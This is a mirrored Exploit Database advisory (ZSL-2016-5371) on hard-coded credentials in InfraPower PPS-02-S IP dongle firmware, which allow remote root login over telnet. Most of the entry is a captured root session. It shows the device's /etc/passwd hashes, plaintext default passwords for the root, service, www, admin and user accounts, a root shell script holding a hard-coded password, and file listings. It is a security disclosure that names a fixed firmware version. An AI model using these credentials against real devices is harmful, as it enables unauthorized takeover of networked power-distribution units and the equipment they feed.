InfraPower PPS-02-S Q213V1 – Hard-Coded Credentials

• Exploit Database
• 21 阅读

• 作者： LiquidWorm
  日期： 2016-10-28
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/40643/

• InfraPower PPS-02-S Q213V1 Hard-coded Credentials Remote Root Access
  
  
  Vendor: Austin Hughes Electronics Ltd.
  Product web page: http://www.austin-hughes.com
  Affected version: Q213V1 (Firmware: V2395S)
  Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
  
  Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
  IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
  Patented IP Dongle provides IP remote access to the PDUs by a true
  network IP address chain. Only 1xIP dongle allows access to max. 16
  PDUs in daisy chain - which is a highly efficient cient application
  for saving not only the IP remote accessories cost, but also the true
  IP addresses required on the PDU management.
  
  Desc: InfraPower suffers from a use of hard-coded credentials. The IP
  dongle firmware ships with hard-coded accounts that can be used to gain
  full system access (root) using the telnet daemon on port 23.
  
  Tested on: Linux 2.6.28 (armv5tel)
   lighttpd/1.4.30-devel-1321
   PHP/5.3.9
   SQLite/3.7.10
  
  
  Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
   @zeroscience
  
  
  Advisory ID: ZSL-2016-5371
  Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5371.php
  
  
  27.09.2016
  
  --
  
  
  # cat /etc/passwd
  
  root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh
  bin:x:1:1:bin:/bin:/bin/sh
  daemon:x:2:2:daemon:/usr/sbin:/bin/sh
  adm:x:3:4:adm:/adm:/bin/sh
  lp:x:4:7:lp:/var/spool/lpd:/bin/sh
  sync:x:5:0:sync:/bin:/bin/sync
  shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
  halt:x:7:0:halt:/sbin:/sbin/halt
  uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
  operator:x:11:0:Operator:/var:/bin/sh
  nobody:x:99:99:nobody:/home:/bin/sh
  admin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script
  user:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script
  service:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh
  www:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh
  www2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh
  
  # showing accounts in root group:
  
  Username: root
  Password: 8475
  --
  Username: service
  Password: ipdongle
  --
  Username: www
  Password: 9311
  --
  Username: www2
  Password: 9311
  
  # showing other less-privileged accounts: 
  
  Username: user
  Password: 8475
  --
  Username: admin
  Password: 8475
  
  --------
  
  /mnt/mtd # echo $SHELL
  /sbin/root_shell.sh
  /mnt/mtd # cat /sbin/root_shell.sh 
  #!/bin/sh
  trap ""2 3 9 24
  
  # check login
  passWork=`cat /mnt/mtd/main_conf | grep RootPassEnable | cut -d " " -f 2`
  
  if [ "$passWork" = "1" ]; then
  login_file=/mnt/mtd/root_login
  now_timestamp=`date +%s`
  
  if [ -f $login_file ]; then
  line=`wc -l $login_file | cut -c 1-9`
  if [ "$line" != "0" ] && [ "$line" != "1" ] && [ "$line" != "2" ]; then
  pre_login=`tail -n 3 $login_file | cut -d " " -f 1`
  pre_result1=`echo $pre_login | cut -d " " -f 1`
  pre_result2=`echo $pre_login | cut -d " " -f 2`
  pre_result3=`echo $pre_login | cut -d " " -f 3`
  if [ "$pre_result1" = "fail" ] && [ "$pre_result2" = "fail" ] && [ "$pre_result3" = "fail" ]; then
  pre_timestamp=`tail -n 1 $login_file | cut -d " " -f 2`
  result=`/sbin/checkLoginTime $pre_timestamp $now_timestamp`
  if [ "$result" != "success" ]; then
  echo $result
  exit 0
  fi
  fi
  fi
  fi
  
  echo -n "password:"
  read pass
  if [ "$pass" != "999" ]; then
  echo "wrong password"
  echo fail $now_timestamp >> $login_file
  exit 0
  fi
  echo success $now_timestamp >> $login_file
  fi
  
  /bin/sh
  /mnt/mtd # 
  
  --------
  
  /mnt/mtd # ls
  IMG001.exe boot.old.shload_config.logmain_confnet_conf passwd_confsnmp_confweb_conf
  PDU3_ini box_conf log_memCheck.txt main_conf.baknet_conf.old port_confsnmpd.conf
  PDU3_pol info.zip mac_addr me_login ntp_conf privatestart_service.log
  
  --------
  
  /mnt/mtd # df -h
  
  FilesystemSizeUsed Available Use% Mounted on
  tmpfs 256.0M4.0K256.0M 0% /tmp
  /dev/mtdblock11.4M 96.0K1.3M 7% /mnt/mtd
  /dev/mtdblock51.0M 60.0K964.0K 6% /mnt/mtd1
  /dev/mtdblock61.0M 60.0K964.0K 6% /mnt/mtd2
  /dev/mtdblock71.0M 60.0K964.0K 6% /mnt/mtd3
  
  --------
  
  /www # ls -al
  
  drwxr-xr-x5 1013 10140 Jan 13 08:41 .
  drwxr-xr-x 16 root root0 Nov 28 11:17 ..
  -rwxr--r--1 1013 1014 6875 Apr 222014 CSSSource.php
  -rwxr--r--1 1013 1014291 Apr 222014 Config.php
  -rwxr--r--1 1013 1014 1685 Apr 222014 ConnPort.php
  -rwxr--r--1 1013 1014 5787 Apr 222014 FWUpgrade.php
  -rwxr--r--1 1013 1014 7105 Apr 222014 Firmware.php
  -rwxr--r--1 1013 101410429 Apr 222014 Function.php
  drwxr-xr-x2 1013 10140 Apr 222014 General
  -rwxr--r--1 1013 1014 1407 Apr 222014 Header.php
  -rwxr--r--1 1013 1014 6775 Apr 222014 IPSettings.php
  drwxr-xr-x2 1013 10140 Apr 222014 Images
  drwxr-xr-x2 1013 10140 Apr 222014 JavaScript
  -rwxr--r--1 1013 1014408 Apr 222014 JavaSource.php
  -rwxr--r--1 1013 1014849 Apr 222014 ListFile.php
  -rwxr--r--1 1013 101412900 Apr 222014 Login.php
  -rwxr--r--1 1013 1014355 Apr 222014 Logout.php
  -rwxr--r--1 1013 1014352 Apr 222014 Main_Config.php
  -rwxr--r--1 1013 1014 5419 Apr 222014 Menu.php
  -rwxr--r--1 1013 1014942 Apr 222014 Menu_3.php
  -rwxr--r--1 1013 1014 4491 Apr 222014 Ntp.php
  -rwxr--r--1 1013 101423853 Apr 222014 OutletDetails.php
  -rwxr--r--1 1013 1014 1905 Apr 222014 OutletDetails_Ajax.php
  -rwxr--r--1 1013 101448411 Apr 222014 PDUDetails.php
  -rwxr--r--1 1013 1014 4081 Apr 222014 PDUDetails_Ajax_Details.php
  -rwxr--r--1 1013 1014 1397 Apr 222014 PDUDetails_Ajax_Outlet.php
  -rwxr--r--1 1013 101419165 Apr 222014 PDULog.php
  -rwxr--r--1 1013 101429883 Apr 222014 PDUStatus.php
  -rwxr--r--1 1013 1014 4418 Apr 222014 PDUStatus_Ajax.php
  -rwxr--r--1 1013 1014 7791 Apr 222014 PortSettings.php
  -rwxr--r--1 1013 101424696 Apr 222014 SNMP.php
  -rwxr--r--1 1013 101438253 Apr 222014 SensorDetails.php
  -rwxr--r--1 1013 101427210 Apr 222014 SensorStatus.php
  -rwxr--r--1 1013 1014 5984 Apr 222014 SensorStatus_Ajax.php
  -rwxr--r--1 1013 101440944 Apr 222014 System.php
  -rwxr--r--1 1013 1014 4373 Apr 222014 UploadEXE.php
  -rwxr--r--1 1013 1014 9460 Apr 222014 User.php
  -rwxr--r--1 1013 101423170 Apr 222014 WriteRequest.php
  -rwxr--r--1 1013 1014 8850 Apr 222014 WriteRequest_Ajax.php
  -rwxr--r--1 1013 101410811 Apr 222014 dball.php
  -rwxr--r--1 1013 1014771 Apr 222014 doupgrate.php
  -rwxr--r--1 1013 1014 76 Apr 222014 index.php
  -rwxr--r--1 1013 1014 49 Apr 222014 nfs.sh
  -rwxr--r--1 1013 1014 5410 Apr 222014 production_test1.php
  -rwxr--r--1 1013 1014723 Apr 222014 vaildate.php
  -rwxr--r--1 1013 1014611 Apr 222014 wiseup.php